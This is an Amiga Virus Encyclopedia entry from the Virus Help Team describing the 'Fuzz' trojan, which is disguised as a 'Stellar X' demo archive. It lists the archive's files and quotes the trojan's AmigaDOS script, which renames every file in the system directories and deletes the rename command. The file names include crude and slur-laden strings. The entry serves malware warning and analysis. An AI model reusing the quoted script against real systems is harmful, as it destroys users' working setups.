Fuzz Trojan - Amiga Virus Encyclopedia

VIRUS HELP TEAM



     ------------------------
     Amiga Virus Encyclopedia
     Fuzz Trojan
     ------------------------
     
     ---------------------------------------------------------------------
               Fuzz Trojan is unknown to all Anti-Virus programs
     ---------------------------------------------------------------------
     
     ..........................  VIRUS HELP TEAM  ........................

     Hi All....                                              11 april 2020

     We have just recived this archive.  It is said to be a demo for ECS &
     AGA machines. But if you run this demo, your Amiga system will in C:,
     S:, Devs:, L; Libs:, will be renamed
     
     We are not really sure how old this trojan are but at this time there
     is NO ANTIVIRUS program that can find it. So watch out for it.
     
     Here is some info about the trojan:
     ------------------------------------------------------
     Trojan name... : Fuzz
     Trojan file... : Many files do damage
     Trojan size... : Many files
     Trojan archive : Stellarx.lha
     Archive size.. : 444.898 bytes
     Archive info.. : 'Stellar X' Demo - ECS & AGA Machines
     ------------------------------------------------------

     There is an  ReadMe.txt in the archive, with  an add from  a Canadian
     BBS, called 'Peace Courier Canadian HQ', saying  they use a 14.4  USR
     Dual modem.
     So we guess it must be an old trojan, there aint many BBS'es left.


     The trojan bomb is named 'Stellar X Demo' When you start the Demo, it
     looks like this:
     Yo! Fuk-Dat-Boyee... UpTheAss
     Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
     navel creditz


     The FuZZ trojan archive contains many other files:

     BooYaKa               = Script-File
     BooYaka.info          = Icon
     ReadMe.txt            = BBS add
     DATA/Boyee            = Rename-Command
     DATA/Yo!              = Run-Command
     DATA/Fuk-Dat-Boyee... = CLI Show-Command (Picture-Shower)
     DATA/navel            = Execute-Command
     DATA/Fuk-Diz-Boyee... = Noiseplayer (Module-Player)
     DATA/Wigger!          = Soundmodule
     DATA/fuzzy            = List-Command
     DATA/creditz          = Script-File
     DATA/Dude             = Dir-Command
     DATA/BooYaKa          = Script-File
     DATA/UpTheAss         = Picture


     If you start the trojan, it executes the Script-File 'BooYaKa':

     Where you can read this in the script:
     cd data         
     execute booyaka

     This means that the trojan will execute the file
     'DATA/BooYaKa'. This file contains:

     Yo! Fuk-Dat-Boyee... UpTheAss
     Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
     navel creditz         

     Now the trojan displays the picture 'UpTheAss'.
     Then the module Wigger!.
     And executes the script-file creditz:

     fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank
     fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank
     fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank
     fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank
     fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank
     fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank
     delete c:rename

     Now the trojan will rename every file in:
     S:
     C:
     Fonts:
     Libs:
     L:
     Devs:
     And deletes the command c:rename


     ---------------------------------------------------------------------
               Fuzz Trojan is unknown to all Anti-Virus programs
     ---------------------------------------------------------------------


     Regards....
          __      Jan Andersen
     __  ///     ---------------
     \\\///      Virus Help Team
      \XX/        www.vht-dk.dk

                    
     

Virum Help Team
Denmark & Canada
Copyright © All rights reserved
www.vht.dk